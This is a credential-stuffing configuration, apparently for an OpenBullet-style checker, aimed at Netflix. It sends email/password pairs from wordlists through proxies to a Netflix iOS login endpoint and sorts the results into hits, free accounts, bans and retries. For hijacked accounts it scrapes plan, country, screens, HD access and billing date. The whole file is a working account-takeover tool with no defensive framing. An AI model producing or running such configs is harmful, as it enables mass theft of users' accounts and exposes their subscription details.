[SETTINGS]
{
  "Name": "Netflix",
  "SuggestedBots": 150,
  "LastModified": "2018-08-26T20:37:07.4408387+02:00",
  "AdditionalInfo": "",
  "Author": "Burnwood",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "UserPass",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
REQUEST POST "https://api-global.netflix.com/iosui/user/9.0" AutoRedirect=FALSE 
  CONTENT "appInternalVersion=9.0.0&appVersion=9.0.0&callPath=[\"moneyball\",\"appleSignUp\",\"next\"]&device_type=NFAPPL-02-&idiom=phone&iosVersion=11.3&isTablet=false&kids=false&maxDeviceWidth=320&method=call&model=saget&modelType=IPHONE8-4&odpAware=true&param={\"action\":\"loginAction\",\"fields\":{\"email\":\"<USER>\",\"rememberMe\":\"true\",\"password\":\"<PASS>\"},\"verb\":\"POST\",\"mode\":\"login\",\"flow\":\"appleSignUp\"}&pathFormat=graph&pixelDensity=2.0&progressive=false&responseFormat=json" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Argo/9.0.2 (iPhone; iOS 11.3; Scale/2.00)" 
  HEADER "Pragma: no-cache" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Success OR 
    KEY "CURRENT_MEMBER" 
    KEY "\"mode\":\"memberHome\"," 
  KEYCHAIN Failure OR 
    KEY "\"mode\":\"login\"," 
    KEY "throttling_failure" 
  KEYCHAIN CUSTOM "FREE" OR 
    KEY "\"mode\":\"welcome\"," 
  KEYCHAIN Success OR 
    KEY "\"mode\":\"memberHome\"," 
    KEY "CURRENT_MEMBER" 
  KEYCHAIN Ban OR 
    KEY "throttling_failure" 
    KEY "Invalid Request" 
  KEYCHAIN Retry OR 
    KEY "postDyscom" 
REQUEST GET "https://www.netflix.com/youraccount?nftoken=" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
#Subscription PARSE "<SOURCE>" LR "\"membershipStatus\":\"" "\"," Recursive=FALSE -> CAP "Subscription" "" "" 
#Country PARSE "<SOURCE>" LR "\"countrycode\":\"" "\",\"" Recursive=FALSE -> CAP "Country" "" "" 
#DVD PARSE "<SOURCE>" LR "\"isDVD\":" "," Recursive=FALSE -> CAP "DVD" "" "" 
#Trial PARSE "<SOURCE>" LR "\"isInFreeTrial\":" "," Recursive=FALSE -> CAP "Trial" "" "" 
#Screens PARSE "<SOURCE>" LR "\"maxStreams\":" "," Recursive=FALSE -> CAP "Screens" "" "" 
#HD PARSE "<SOURCE>" LR "\"hasHD\":" "," Recursive=FALSE -> CAP "HD" "" "" 
#Ultra_HD PARSE "<SOURCE>" LR "\"hasUHD\":" "," Recursive=FALSE -> CAP "Ultra HD" "" "" 
#Next_billing PARSE "<SOURCE>" LR "\"nextBillingDate\":\"" "\"" Recursive=FALSE -> CAP "Next billing" "" "" 
